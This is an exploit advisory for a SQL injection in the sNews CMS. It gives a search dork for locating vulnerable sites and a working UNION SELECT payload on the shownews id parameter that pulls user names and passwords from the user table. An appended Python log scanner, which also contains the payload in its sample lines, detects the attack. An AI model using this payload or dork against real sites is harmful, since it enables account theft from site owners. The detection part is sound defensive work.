Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************
SQL PoC:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

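
Added example, not part of the original advisory or of the sNews code base: a log check that flags shownews requests like the one above. It assumes legitimate id values are plain integers and that the web server writes the request line in quotes; the log lines and the names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# /*...*/ comments used in place of spaces, plus an unterminated trailing "/*".
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a finding for a shownews request whose id is not a plain integer."""
    parts = urlsplit(target)
    if not parts.path.endswith("/snews.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes
    if params.get("act", [""])[0] != "shownews":
        return None
    for value in params.get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue
        # Strip comment padding so "union/**/select" reads as "union select".
        flat = re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value))
        return "union-select" if UNION_SELECT.search(flat) else "non-numeric-id"
    return None

def scan(lines):
    """Yield (line_number, finding) for each flagged access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        finding = classify(match.group(1)) if match else None
        if finding:
            yield number, finding

# Constructed sample log lines (addresses, timestamps and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 734',
    '192.0.2.45 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=12abc HTTP/1.1" 200 412',
    '192.0.2.10 - - [01/Jan/2013:10:00:11 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

The same integer-only rule, enforced on the server before id reaches the query, closes the injection point rather than only detecting its use.
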
Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*